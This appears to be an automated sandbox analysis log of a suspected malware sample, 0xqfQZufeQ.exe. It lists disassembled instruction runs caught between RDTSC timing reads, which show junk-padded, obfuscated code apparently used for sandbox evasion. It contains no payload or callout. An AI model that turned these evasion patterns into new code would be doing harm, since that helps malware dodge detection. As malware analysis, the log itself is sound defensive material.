Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54401AD second address: 54401B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54401B1 second address: 54401B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54401B5 second address: 544020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007FF724EF30A8h 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 jmp 00007FF724EF30A1h 0x00000017 and ecx, 1Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF724EF30A8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 544020A second address: 544020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 544020E second address: 5440214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440214 second address: 5440248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 587547D3h 0x00000008 call 00007FF724E96558h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 ror eax, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF724E9654Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440248 second address: 544025F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF724EF30A1h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 544025F second address: 5440281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF724E96558h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440281 second address: 54402D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2BE7BDC4h 0x00000008 pushfd 0x00000009 jmp 00007FF724EF309Dh 0x0000000e xor si, B306h 0x00000013 jmp 00007FF724EF30A1h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c retn 0004h 0x0000001f nop 0x00000020 mov esi, eax 0x00000022 lea eax, dword ptr [ebp-08h] 0x00000025 xor esi, dword ptr [00AC2014h] 0x0000002b push eax 0x0000002c push eax 0x0000002d push eax 0x0000002e lea eax, dword ptr [ebp-10h] 0x00000031 push eax 0x00000032 call 00007FF7298B335Ah 0x00000037 push FFFFFFFEh 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF724EF30A8h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54402D2 second address: 54402D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54402D8 second address: 54402DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54402DE second address: 5440308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007FF724E96554h 0x0000000e ret 0x0000000f nop 0x00000010 push eax 0x00000011 call 00007FF72985684Bh 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov si, bx 0x0000001e movsx ebx, ax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440308 second address: 544031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 544031D second address: 5440326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9F44h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440326 second address: 5440343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF724EF30A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440343 second address: 5440347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440347 second address: 5440362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c push esi 0x0000000d mov ch, bl 0x0000000f pop ecx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movzx ecx, bx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440362 second address: 5440368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440368 second address: 544036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F005D second address: 53F0090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 76936BB3h 0x00000008 call 00007FF724E96558h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF724E9654Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0090 second address: 53F0117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF724EF30A6h 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007FF724EF30A0h 0x00000018 xchg eax, ecx 0x00000019 jmp 00007FF724EF30A0h 0x0000001e push eax 0x0000001f pushad 0x00000020 pushad 0x00000021 jmp 00007FF724EF30A7h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 mov cx, 2625h 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FF724EF30A7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0117 second address: 53F011C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F011C second address: 53F016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF724EF30A5h 0x0000000a jmp 00007FF724EF309Bh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FF724EF30A6h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF724EF309Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F016E second address: 53F0172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0172 second address: 53F0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0178 second address: 53F01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF724E96557h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F01A2 second address: 53F01D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF724EF309Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F01D1 second address: 53F01D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F01D7 second address: 53F01DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F01DB second address: 53F021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF724E96556h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF724E9654Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F021C second address: 53F02E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FF724EF30A4h 0x00000010 pushfd 0x00000011 jmp 00007FF724EF30A2h 0x00000016 adc si, 4168h 0x0000001b jmp 00007FF724EF309Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 jmp 00007FF724EF30A6h 0x0000002a xchg eax, edi 0x0000002b jmp 00007FF724EF30A0h 0x00000030 push eax 0x00000031 jmp 00007FF724EF309Bh 0x00000036 xchg eax, edi 0x00000037 jmp 00007FF724EF30A6h 0x0000003c test esi, esi 0x0000003e jmp 00007FF724EF30A0h 0x00000043 je 00007FF796F913E6h 0x00000049 jmp 00007FF724EF30A0h 0x0000004e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F02E8 second address: 53F02EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F02EC second address: 53F0309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0309 second address: 53F033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF796F34853h 0x0000000f jmp 00007FF724E9654Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dl, 6Eh 0x0000001c mov edi, eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0831 second address: 53E0835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0835 second address: 53E083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E083B second address: 53E0855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 53h 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 mov bl, cl 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0855 second address: 53E0859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0859 second address: 53E085F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E085F second address: 53E08CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF724E96550h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007FF724E9654Eh 0x00000017 mov dx, ax 0x0000001a pop ecx 0x0000001b mov si, bx 0x0000001e popad 0x0000001f and esp, FFFFFFF8h 0x00000022 pushad 0x00000023 mov al, dl 0x00000025 jmp 00007FF724E96550h 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF724E96557h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E08CA second address: 53E08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E08D0 second address: 53E08E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E08E8 second address: 53E08EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E08EE second address: 53E091F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ax, 76F3h 0x0000000f mov esi, 009C8F4Fh 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF724E96551h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E091F second address: 53E09C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushfd 0x0000000d jmp 00007FF724EF30A6h 0x00000012 adc cl, FFFFFF88h 0x00000015 jmp 00007FF724EF309Bh 0x0000001a popfd 0x0000001b pop eax 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f pushad 0x00000020 movsx edi, si 0x00000023 mov di, si 0x00000026 popad 0x00000027 mov esi, 5E05D4EFh 0x0000002c popad 0x0000002d mov esi, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FF724EF30A0h 0x00000037 xor cx, BF18h 0x0000003c jmp 00007FF724EF309Bh 0x00000041 popfd 0x00000042 push eax 0x00000043 pushad 0x00000044 popad 0x00000045 pop edi 0x00000046 popad 0x00000047 sub ebx, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FF724EF30A9h 0x00000052 jmp 00007FF724EF309Bh 0x00000057 popfd 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E09C6 second address: 53E0A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FF724E9654Eh 0x00000010 je 00007FF796F3BEE1h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF724E9654Dh 0x0000001f or cx, 4E26h 0x00000024 jmp 00007FF724E96551h 0x00000029 popfd 0x0000002a mov esi, 09965B57h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0A27 second address: 53E0AE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 jmp 00007FF724EF309Ch 0x00000016 movzx ecx, dx 0x00000019 popad 0x0000001a mov ecx, esi 0x0000001c pushad 0x0000001d call 00007FF724EF30A3h 0x00000022 mov bx, ax 0x00000025 pop ecx 0x00000026 mov esi, edx 0x00000028 popad 0x00000029 je 00007FF796F989CCh 0x0000002f jmp 00007FF724EF30A7h 0x00000034 test byte ptr [77516968h], 00000002h 0x0000003b jmp 00007FF724EF30A6h 0x00000040 jne 00007FF796F989A5h 0x00000046 pushad 0x00000047 movzx ecx, di 0x0000004a mov ebx, 29F6717Eh 0x0000004f popad 0x00000050 mov edx, dword ptr [ebp+0Ch] 0x00000053 jmp 00007FF724EF30A5h 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FF724EF309Eh 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0AE5 second address: 53E0AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0AEB second address: 53E0B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF724EF30A5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B10 second address: 53E0B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B14 second address: 53E0B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B1A second address: 53E0B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B31 second address: 53E0B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B35 second address: 53E0B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B3B second address: 53E0B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF724EF309Ch 0x00000013 and cl, FFFFFFC8h 0x00000016 jmp 00007FF724EF309Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B75 second address: 53E0B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B7A second address: 53E0B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF724EF30A2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B90 second address: 53E0B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0B94 second address: 53E0BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BA3 second address: 53E0BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BA7 second address: 53E0BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BAB second address: 53E0BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BB1 second address: 53E0BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BB7 second address: 53E0BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BBB second address: 53E0BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BBF second address: 53E0BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF724E96554h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0BE0 second address: 53E0C08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 jmp 00007FF724EF309Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+10h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF724EF309Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0C3C second address: 53E0C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0C42 second address: 53E0C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0C46 second address: 53E0C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx esi, dx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0E38 second address: 53F0E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0E3C second address: 53F0E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0B4C second address: 53F0B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0B50 second address: 53F0B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0B56 second address: 53F0B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0B75 second address: 53F0B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0B79 second address: 53F0B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
